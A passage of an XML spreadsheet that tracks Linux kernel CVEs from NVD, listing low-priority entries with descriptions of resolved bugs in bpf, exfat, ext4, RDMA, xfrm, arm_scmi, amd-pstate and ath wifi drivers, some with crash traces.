1. A fexit attached to a tail_call_reachable prog. 'tr-&gt;flags' became
   'BPF_TRAMP_F_CALL_ORIG | BPF_TRAMP_F_TAIL_CALL_CTX'. And, the
   trampoline would poke the target prog's nop insn using jmp insn instead
   of call insn.
2. Another fexit loaded with the same tail_call_reachable prog target.
   'tr-&gt;flags' became 'BPF_TRAMP_F_TAIL_CALL_CTX'.
3. Close the first fexit link. Due to no BPF_TRAMP_F_CALL_ORIG in
   'tr-&gt;flags', the trampoline will fail to restore the prog's nop insn
   using call insn.
[    3.410719] WARNING: kernel/bpf/syscall.c:3551 at bpf_tracing_link_release+0x53/0x60, CPU#1: test_progs/98
...
[    3.428793]  bpf_link_free+0x58/0x130
[    3.429293]  bpf_link_release+0x23/0x30
Fix the warning by updating 'tr-&gt;flags' with '|=' and lock.</t>
        </is>
      </c>
      <c r="T814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92485</t>
        </is>
      </c>
    </row>
    <row r="815">
      <c r="A815" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B815" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92486</t>
        </is>
      </c>
      <c r="D815" s="5" t="inlineStr"/>
      <c r="E815" s="5" t="inlineStr"/>
      <c r="F815" s="5" t="inlineStr"/>
      <c r="G815" s="5" t="inlineStr"/>
      <c r="H815" s="5" t="inlineStr"/>
      <c r="I815" s="5" t="inlineStr"/>
      <c r="J815" s="5" t="inlineStr"/>
      <c r="K815" s="5" t="inlineStr"/>
      <c r="L815" s="5" t="inlineStr"/>
      <c r="M815" s="5" t="inlineStr"/>
      <c r="N815" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O815" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P815" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q815" s="5" t="inlineStr"/>
      <c r="R815" s="5" t="inlineStr"/>
      <c r="S815" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix CFI mismatch in task work callback
BPF subprograms use the bpf_callback_t ABI, but task work invokes the
callback through a three-argument function pointer. This trips kCFI.
Store and invoke the callback as bpf_callback_t.</t>
        </is>
      </c>
      <c r="T815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92486</t>
        </is>
      </c>
    </row>
    <row r="816">
      <c r="A816" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B816" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92487</t>
        </is>
      </c>
      <c r="D816" s="5" t="inlineStr"/>
      <c r="E816" s="5" t="inlineStr"/>
      <c r="F816" s="5" t="inlineStr"/>
      <c r="G816" s="5" t="inlineStr"/>
      <c r="H816" s="5" t="inlineStr"/>
      <c r="I816" s="5" t="inlineStr"/>
      <c r="J816" s="5" t="inlineStr"/>
      <c r="K816" s="5" t="inlineStr"/>
      <c r="L816" s="5" t="inlineStr"/>
      <c r="M816" s="5" t="inlineStr"/>
      <c r="N816" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O816" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P816" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q816" s="5" t="inlineStr"/>
      <c r="R816" s="5" t="inlineStr"/>
      <c r="S816" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
exfat: fix valid_size extension over a shared writable mapping
When a shared writable mapping has its valid_size extended by a buffered
write or a page fault, exfat zeroes the page-cache gap below the new
valid_size. A store through the mapping can race with this zeroing and be
overwritten.
Fix this by zeroing the gap lazily. Drop -&gt;map_pages so that every first
write fault goes through exfat_page_mkwrite(), which advances valid_size to
cover the faulting page. With fault-around enabled, a store could install a
writable PTE, skip -&gt;page_mkwrite(), and land past valid_size without
advancing it. Extending valid_size one faulting page at a time also leaves
never-written pages in a large mapping alone.
The gap is filled with block granularity, zeroing only the not-uptodate
blocks and preserving blocks that may hold data stored through the mapping.
On the buffered-write path the invalidate lock is held and the gap is
unmapped before zeroing, so a racing store re-faults and, under the inode
lock, completes only after the gap has been zeroed and valid_size covers
it.</t>
        </is>
      </c>
      <c r="T816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92487</t>
        </is>
      </c>
    </row>
    <row r="817">
      <c r="A817" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B817" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92488</t>
        </is>
      </c>
      <c r="D817" s="5" t="inlineStr"/>
      <c r="E817" s="5" t="inlineStr"/>
      <c r="F817" s="5" t="inlineStr"/>
      <c r="G817" s="5" t="inlineStr"/>
      <c r="H817" s="5" t="inlineStr"/>
      <c r="I817" s="5" t="inlineStr"/>
      <c r="J817" s="5" t="inlineStr"/>
      <c r="K817" s="5" t="inlineStr"/>
      <c r="L817" s="5" t="inlineStr"/>
      <c r="M817" s="5" t="inlineStr"/>
      <c r="N817" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O817" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P817" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q817" s="5" t="inlineStr"/>
      <c r="R817" s="5" t="inlineStr"/>
      <c r="S817" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/erdma: complete object teardown when the destroy command fails
erdma_destroy_qp(), erdma_destroy_cq(), erdma_dereg_mr(), and
erdma_destroy_ah() returned early when erdma_post_cmd_wait() failed,
leaking the queue buffers, MTTs, doorbells and the STAG, QPN, CQN and AHN
identifiers. A command timeout clears ERDMA_CMDQ_STATE_OK_BIT and
permanently disables the command queue, so no retry can succeed; the RDMA
core keeps the object after a failed destructor and forced uverbs cleanup
then nulls the pointers, making the resources unreachable.
Warn on failure but release every software-owned resource and return
success, since during terminal destruction the hardware command result is
only diagnostic.</t>
        </is>
      </c>
      <c r="T817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92488</t>
        </is>
      </c>
    </row>
    <row r="818">
      <c r="A818" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B818" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92489</t>
        </is>
      </c>
      <c r="D818" s="5" t="inlineStr"/>
      <c r="E818" s="5" t="inlineStr"/>
      <c r="F818" s="5" t="inlineStr"/>
      <c r="G818" s="5" t="inlineStr"/>
      <c r="H818" s="5" t="inlineStr"/>
      <c r="I818" s="5" t="inlineStr"/>
      <c r="J818" s="5" t="inlineStr"/>
      <c r="K818" s="5" t="inlineStr"/>
      <c r="L818" s="5" t="inlineStr"/>
      <c r="M818" s="5" t="inlineStr"/>
      <c r="N818" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O818" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P818" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q818" s="5" t="inlineStr"/>
      <c r="R818" s="5" t="inlineStr"/>
      <c r="S818" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfrm: Fix skb double-free in xfrm_dev_direct_output()
A return value other than 1 from local_out() means that the skb has been
consumed or its ownership was transferred. xfrm_dev_direct_output()
nevertheless frees the skb on this path, causing a double-free when
netfilter drops the packet and invalidating any other owner.
Return the local_out() result directly, matching the ownership handling
in xfrm_output_resume().</t>
        </is>
      </c>
      <c r="T818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92489</t>
        </is>
      </c>
    </row>
    <row r="819">
      <c r="A819" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B819" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92490</t>
        </is>
      </c>
      <c r="D819" s="5" t="inlineStr"/>
      <c r="E819" s="5" t="inlineStr"/>
      <c r="F819" s="5" t="inlineStr"/>
      <c r="G819" s="5" t="inlineStr"/>
      <c r="H819" s="5" t="inlineStr"/>
      <c r="I819" s="5" t="inlineStr"/>
      <c r="J819" s="5" t="inlineStr"/>
      <c r="K819" s="5" t="inlineStr"/>
      <c r="L819" s="5" t="inlineStr"/>
      <c r="M819" s="5" t="inlineStr"/>
      <c r="N819" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O819" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P819" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q819" s="5" t="inlineStr"/>
      <c r="R819" s="5" t="inlineStr"/>
      <c r="S819" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Unrequest devices if driver registration fails
scmi_driver_register() requests protocol devices before registering the
driver. If driver_register() fails, those requests remain in the global
IDR and retain pointers to the module's ID table. Once the failed module
load releases that storage, later request matching or SCMI device creation
can dereference the stale pointers.
Unrequest the complete protocol table before returning the registration
failure. At this point table registration succeeded, so every entry is
owned by the current registration attempt.</t>
        </is>
      </c>
      <c r="T819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92490</t>
        </is>
      </c>
    </row>
    <row r="820">
      <c r="A820" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B820" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92491</t>
        </is>
      </c>
      <c r="D820" s="5" t="inlineStr"/>
      <c r="E820" s="5" t="inlineStr"/>
      <c r="F820" s="5" t="inlineStr"/>
      <c r="G820" s="5" t="inlineStr"/>
      <c r="H820" s="5" t="inlineStr"/>
      <c r="I820" s="5" t="inlineStr"/>
      <c r="J820" s="5" t="inlineStr"/>
      <c r="K820" s="5" t="inlineStr"/>
      <c r="L820" s="5" t="inlineStr"/>
      <c r="M820" s="5" t="inlineStr"/>
      <c r="N820" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O820" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P820" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q820" s="5" t="inlineStr"/>
      <c r="R820" s="5" t="inlineStr"/>
      <c r="S820" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Roll back partial protocol table registration
scmi_protocol_table_register() can leave earlier requests registered when
a later entry in the same ID table fails. Each request retains a pointer
to the driver's ID table, so a failed module load can leave a dangling
pointer after the module storage is released.
Unrequest only the successfully registered prefix, in reverse order,
before returning the failure. Leave the failed entry and the remaining
entries untouched because matching requests can be owned by another
driver.</t>
        </is>
      </c>
      <c r="T820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92491</t>
        </is>
      </c>
    </row>
    <row r="821">
      <c r="A821" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B821" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92492</t>
        </is>
      </c>
      <c r="D821" s="5" t="inlineStr"/>
      <c r="E821" s="5" t="inlineStr"/>
      <c r="F821" s="5" t="inlineStr"/>
      <c r="G821" s="5" t="inlineStr"/>
      <c r="H821" s="5" t="inlineStr"/>
      <c r="I821" s="5" t="inlineStr"/>
      <c r="J821" s="5" t="inlineStr"/>
      <c r="K821" s="5" t="inlineStr"/>
      <c r="L821" s="5" t="inlineStr"/>
      <c r="M821" s="5" t="inlineStr"/>
      <c r="N821" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O821" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P821" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q821" s="5" t="inlineStr"/>
      <c r="R821" s="5" t="inlineStr"/>
      <c r="S821" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq/amd-pstate: handle missing policy in dynamic EPP callbacks
cpufreq_cpu_get() returns NULL when no cpufreq policy is associated with
the requested CPU, for example because the CPU is offline or the policy
has already been torn down.  Both amd_pstate_power_supply_notifier() and
amd_pstate_profile_set() acquire a policy via cpufreq_cpu_get() and then
pass that pointer to amd_pstate_get_balanced_epp() and
amd_pstate_set_epp(), which dereference it unconditionally.  A racing
CPU hotplug or driver teardown can therefore lead to a NULL pointer
dereference on either of these dynamic EPP paths.
The third cpufreq_cpu_get() caller in this file, amd_pstate_verify(),
already handles the NULL case.  Bring the two new callers in line with
that pattern: return NOTIFY_OK from the power-supply notifier (matching
the other "nothing to do" exits) and -ENODEV from amd_pstate_profile_set()
(the usual cpufreq error for a missing CPU policy).
Found by code inspection; not tested on hardware.</t>
        </is>
      </c>
      <c r="T821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92492</t>
        </is>
      </c>
    </row>
    <row r="822">
      <c r="A822" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B822" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92493</t>
        </is>
      </c>
      <c r="D822" s="5" t="inlineStr"/>
      <c r="E822" s="5" t="inlineStr"/>
      <c r="F822" s="5" t="inlineStr"/>
      <c r="G822" s="5" t="inlineStr"/>
      <c r="H822" s="5" t="inlineStr"/>
      <c r="I822" s="5" t="inlineStr"/>
      <c r="J822" s="5" t="inlineStr"/>
      <c r="K822" s="5" t="inlineStr"/>
      <c r="L822" s="5" t="inlineStr"/>
      <c r="M822" s="5" t="inlineStr"/>
      <c r="N822" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O822" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P822" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q822" s="5" t="inlineStr"/>
      <c r="R822" s="5" t="inlineStr"/>
      <c r="S822" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq: amd-pstate-ut: Skip tests when amd-pstate driver is not active
The crash issue may occur when modprobe amd_pstate_ut on intel platform.
   amd_pstate_ut: 1    amd_pstate_ut_acpi_cpc_valid  success!
   amd_pstate_ut: 2    amd_pstate_ut_check_enabled   success!
   BUG: kernel NULL pointer dereference, address: 0000000000000080
   #PF: supervisor read access in kernel mode
   #PF: error_code(0x0000) - not-present page
   PGD 0 P4D 0
   Oops: 0000 [#1] SMP NOPTI
   CPU: 0 PID: 20300 Comm: modprobe
   Kdump: loaded Tainted: G O 6.6.0-0010.rc1.ctl4.x86_64 #1
   Hardware name: FiberHome R2200 V5/Xeon Boards, BIOS 3.1a 02/24/2020
   RIP: 0010:amd_pstate_ut_check_perf+0x141/0x280 [amd_pstate_ut]
   Call Trace:
    &lt;TASK&gt;
    amd_pstate_ut_init+0x1b/0xff0 [amd_pstate_ut]
    ? __pfx_amd_pstate_ut_init+0x10/0x10 [amd_pstate_ut]
    do_one_initcall+0x42/0x2e0
    ? kmalloc_trace+0x26/0x90
    do_init_module+0x60/0x240
    __se_sys_init_module+0x185/0x1c0
    do_syscall_64+0x62/0x190
    entry_SYSCALL_64_after_hwframe+0x76/0x7e
    &lt;/TASK&gt;
Add state detection to amd pstate driver to prevent amd_pstate_ut driver
from testing on non-AMD platforms.
(ML: adjust title)</t>
        </is>
      </c>
      <c r="T822" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92493</t>
        </is>
      </c>
    </row>
    <row r="823">
      <c r="A823" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B823" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92494</t>
        </is>
      </c>
      <c r="D823" s="5" t="inlineStr"/>
      <c r="E823" s="5" t="inlineStr"/>
      <c r="F823" s="5" t="inlineStr"/>
      <c r="G823" s="5" t="inlineStr"/>
      <c r="H823" s="5" t="inlineStr"/>
      <c r="I823" s="5" t="inlineStr"/>
      <c r="J823" s="5" t="inlineStr"/>
      <c r="K823" s="5" t="inlineStr"/>
      <c r="L823" s="5" t="inlineStr"/>
      <c r="M823" s="5" t="inlineStr"/>
      <c r="N823" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O823" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P823" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q823" s="5" t="inlineStr"/>
      <c r="R823" s="5" t="inlineStr"/>
      <c r="S823" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ext4: fix buffer_head leak in ext4_init_orphan_info
ext4_init_orphan_info() reads orphan file blocks with ext4_bread()
and stores the returned buffer_head in oi-&gt;of_binfo[i].ob_bh.
If ext4_bread() succeeds but the orphan block magic or checksum
validation fails, the function jumps to out_free. However, the old
out_free loop starts releasing buffers from i - 1, so the current
buffer_head at index i is skipped.
This leaks the buffer_head reference obtained by ext4_bread() on the
bad magic and bad checksum error paths.
Fix this by tracking the number of successfully read buffer_heads and
releasing exactly those buffer_heads on the error path.</t>
        </is>
      </c>
      <c r="T823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92494</t>
        </is>
      </c>
    </row>
    <row r="824">
      <c r="A824" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B824" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C824" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92495</t>
        </is>
      </c>
      <c r="D824" s="5" t="inlineStr"/>
      <c r="E824" s="5" t="inlineStr"/>
      <c r="F824" s="5" t="inlineStr"/>
      <c r="G824" s="5" t="inlineStr"/>
      <c r="H824" s="5" t="inlineStr"/>
      <c r="I824" s="5" t="inlineStr"/>
      <c r="J824" s="5" t="inlineStr"/>
      <c r="K824" s="5" t="inlineStr"/>
      <c r="L824" s="5" t="inlineStr"/>
      <c r="M824" s="5" t="inlineStr"/>
      <c r="N824" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O824" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P824" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q824" s="5" t="inlineStr"/>
      <c r="R824" s="5" t="inlineStr"/>
      <c r="S824" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/bnxt_re: Clear VM_MAYWRITE on DBR/toggle page mmap
bnxt_re_mmap() rejects VM_WRITE for the DBR_PAGE and TOGGLE_PAGE mmap
flags, but a read-only mapping can still retain VM_MAYWRITE. nd later
be upgraded with mprotect(PROT_WRITE). This can bypass the write check
that only runs at mmap time.
Clear VM_MAYWRITE before vm_insert_page() in the shared DBR/toggle-page
branch, matching the existing policy that userspace writes are not
expected for these pages.</t>
        </is>
      </c>
      <c r="T824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92495</t>
        </is>
      </c>
    </row>
    <row r="825">
      <c r="A825" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B825" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92496</t>
        </is>
      </c>
      <c r="D825" s="5" t="inlineStr"/>
      <c r="E825" s="5" t="inlineStr"/>
      <c r="F825" s="5" t="inlineStr"/>
      <c r="G825" s="5" t="inlineStr"/>
      <c r="H825" s="5" t="inlineStr"/>
      <c r="I825" s="5" t="inlineStr"/>
      <c r="J825" s="5" t="inlineStr"/>
      <c r="K825" s="5" t="inlineStr"/>
      <c r="L825" s="5" t="inlineStr"/>
      <c r="M825" s="5" t="inlineStr"/>
      <c r="N825" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O825" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P825" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q825" s="5" t="inlineStr"/>
      <c r="R825" s="5" t="inlineStr"/>
      <c r="S825" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath11k: Avoid buffer overread in ath11k_wmi_tlv_op_rx()
Currently, in ath11k_wmi_tlv_op_rx(), the firmware buffer is read
without first verifying that the buffer has enough data to hold a
header. This could result in a buffer overread.
Add an upfront length check before dereferencing skb-&gt;data as a
wmi_cmd_hdr. The check is placed before the trace_ath11k_wmi_event()
call to preserve the existing trace semantics (tracing the full raw
WMI event including the header), unlike the analogous ath12k fix which
could use skb_pull_data() directly.
Compile tested only.</t>
        </is>
      </c>
      <c r="T825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92496</t>
        </is>
      </c>
    </row>
    <row r="826">
      <c r="A826" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B826" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C826" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92497</t>
        </is>
      </c>
      <c r="D826" s="5" t="inlineStr"/>
      <c r="E826" s="5" t="inlineStr"/>
      <c r="F826" s="5" t="inlineStr"/>
      <c r="G826" s="5" t="inlineStr"/>
      <c r="H826" s="5" t="inlineStr"/>
      <c r="I826" s="5" t="inlineStr"/>
      <c r="J826" s="5" t="inlineStr"/>
      <c r="K826" s="5" t="inlineStr"/>
      <c r="L826" s="5" t="inlineStr"/>
      <c r="M826" s="5" t="inlineStr"/>
      <c r="N826" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O826" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P826" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q826" s="5" t="inlineStr"/>
      <c r="R826" s="5" t="inlineStr"/>
      <c r="S826" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath12k: Avoid buffer overread in ath12k_wmi_op_rx()
Currently, in ath12k_wmi_op_rx(), the firmware buffer is read without
first verifying that the buffer has enough data to hold a header. This
could result in a buffer overread.
Update the logic to verify the buffer contains at least enough data to
hold a wmi_cmd_hdr before reading from the buffer.
Tested-on: WCN7850 hw2.0 PCI WLAN.HMT.1.1.c7-00108-QCAHMTSWPL_V1.0_V2.0_SILICONZ_UPSTREAM-3</t>
        </is>
      </c>
      <c r="T826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92497</t>
        </is>
      </c>
    </row>
    <row r="827">
      <c r="A827" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B827" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C827" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92498</t>
        </is>
      </c>
      <c r="D827" s="5" t="inlineStr"/>
      <c r="E827" s="5" t="inlineStr"/>
      <c r="F827" s="5" t="inlineStr"/>
      <c r="G827" s="5" t="inlineStr"/>
      <c r="H827" s="5" t="inlineStr"/>
      <c r="I827" s="5" t="inlineStr"/>
      <c r="J827" s="5" t="inlineStr"/>
      <c r="K827" s="5" t="inlineStr"/>
      <c r="L827" s="5" t="inlineStr"/>
      <c r="M827" s="5" t="inlineStr"/>
      <c r="N827" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O827" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P827" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q827" s="5" t="inlineStr"/>
      <c r="R827" s="5" t="inlineStr"/>
      <c r="S827" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath6kl: avoid buffer overreads in WMI event handlers
The following WMI event handlers currently read from the event buffer
without first verifying that the message was large enough to hold the
expected event:
ath6kl_wmi_scan_complete_rx()
ath6kl_wmi_addba_req_event_rx()
ath6kl_wmi_delba_req_event_rx()
Add length checks to prevent overread.</t>
        </is>
      </c>
      <c r="T827" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92498</t>
        </is>
      </c>
    </row>
    <row r="828">
      <c r="A828" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B828" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92499</t>
        </is>
      </c>
      <c r="D828" s="5" t="inlineStr"/>
      <c r="E828" s="5" t="inlineStr"/>
      <c r="F828" s="5" t="inlineStr"/>
      <c r="G828" s="5" t="inlineStr"/>
      <c r="H828" s="5" t="inlineStr"/>
      <c r="I828" s="5" t="inlineStr"/>
      <c r="J828" s="5" t="inlineStr"/>
      <c r="K828" s="5" t="inlineStr"/>
      <c r="L828" s="5" t="inlineStr"/>
      <c r="M828" s="5" t="inlineStr"/>
      <c r="N828" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O828" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P828" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q828" s="5" t="inlineStr"/>
      <c r="R828" s="5" t="inlineStr"/>
      <c r="S828" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ext4: validate readdir offset before accessing dirent
A corrupted directory can trigger the following KASAN report when
ext4_readdir() resumes from an invalid position:
  BUG: KASAN: use-after-free in __ext4_check_dir_entry+0x5ef/0x820
  Read of size 2 at addr ffff88810a646000 by task repro_linear/509
  Call Trace:
   &lt;TASK&gt;
   dump_stack_lvl+0x53/0x70
   print_report+0xd0/0x630
   kasan_report+0xce/0x100
   __ext4_check_dir_entry+0x5ef/0x820
   ext4_readdir+0xcde/0x2b70
   iterate_dir+0x1a1/0x520
   __x64_sys_getdents64+0x12b/0x220
   do_syscall_64+0xf9/0x540
   entry_SYSCALL_64_after_hwframe+0x77/0x7f
   &lt;/TASK&gt;
KASAN reports use-after-free because the out-of-bounds access lands in an
adjacent freed page. The directory buffer itself is still referenced.
ext4_dir_llseek() invalidates the directory cookie so that ext4_readdir()
rescans directory entries from the start of the block. The rescan checks
only the lower bound of rec_len before advancing. A corrupted rec_len can
therefore place the offset where the block has insufficient space for a
complete directory entry. The rescan itself may dereference that truncated
entry, or the main loop may pass it to __ext4_check_dir_entry(). The latter
reads de-&gt;rec_len before validating the range. For example:
  block offset  0                           4092  4096
                |---- de1.rec_len = 4092 -----|----|
                                               de2.inode
                                                    | de2.rec_len
                                                    ^ OOB, reported as UAF
de2 starts at offset 4092 in this 4 KiB block. Its four-byte inode fits in
the block, but its rec_len starts at offset 4096 and crosses the boundary.
The minimum safe length is inode-dependent. Encrypted and casefolded
directory entries need eight additional hash bytes, while a valid metadata
checksum tail is only 12 bytes.
Cache the metadata checksum feature state and derive the minimum directory
entry length from the on-disk format. Use it to bound both the rescan and
the offset passed to the main loop. Report an offset in a truncated block
tail and skip the remainder of the block, while continuing to accept an
offset exactly at the block boundary.</t>
        </is>
      </c>
      <c r="T828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92499</t>
        </is>
      </c>
    </row>
    <row r="829">
      <c r="A829" s="5" t="inlineStr">
        <is>
